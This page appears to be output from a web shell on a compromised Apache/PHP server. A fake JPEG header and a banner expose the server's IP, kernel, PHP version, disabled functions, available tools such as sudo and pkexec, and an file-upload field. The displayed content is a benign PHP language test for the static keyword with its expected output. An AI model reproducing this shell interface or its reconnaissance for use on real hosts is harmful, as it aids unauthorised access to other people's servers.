????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.191 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/tests/lang/ |
Upload File : |
--TEST--
Static keyword - basic tests
--FILE--
<?php
echo "\nSame variable used as static and non static.\n";
function staticNonStatic() {
echo "---------\n";
$a=0;
echo "$a\n";
static $a=10;
echo "$a\n";
$a++;
}
staticNonStatic();
staticNonStatic();
staticNonStatic();
echo "\nLots of initialisations in the same statement.\n";
function manyInits() {
static $counter=0;
echo "------------- Call $counter --------------\n";
static $a, $b=10, $c=20, $d, $e=30;
echo "Unitialised : $a\n";
echo "Initialised to 10: $b\n";
echo "Initialised to 20: $c\n";
echo "Unitialised : $d\n";
echo "Initialised to 30: $e\n";
$a++;
$b++;
$c++;
$d++;
$e++;
$counter++;
}
manyInits();
manyInits();
manyInits();
echo "\nUsing static keyword at global scope\n";
for ($i=0; $i<3; $i++) {
static $s, $k=10;
echo "$s $k\n";
$s++;
$k++;
}
?>
--EXPECT--
Same variable used as static and non static.
---------
0
10
---------
0
11
---------
0
12
Lots of initialisations in the same statement.
------------- Call 0 --------------
Unitialised :
Initialised to 10: 10
Initialised to 20: 20
Unitialised :
Initialised to 30: 30
------------- Call 1 --------------
Unitialised : 1
Initialised to 10: 11
Initialised to 20: 21
Unitialised : 1
Initialised to 30: 31
------------- Call 2 --------------
Unitialised : 2
Initialised to 10: 12
Initialised to 20: 22
Unitialised : 2
Initialised to 30: 32
Using static keyword at global scope
10
1 11
2 12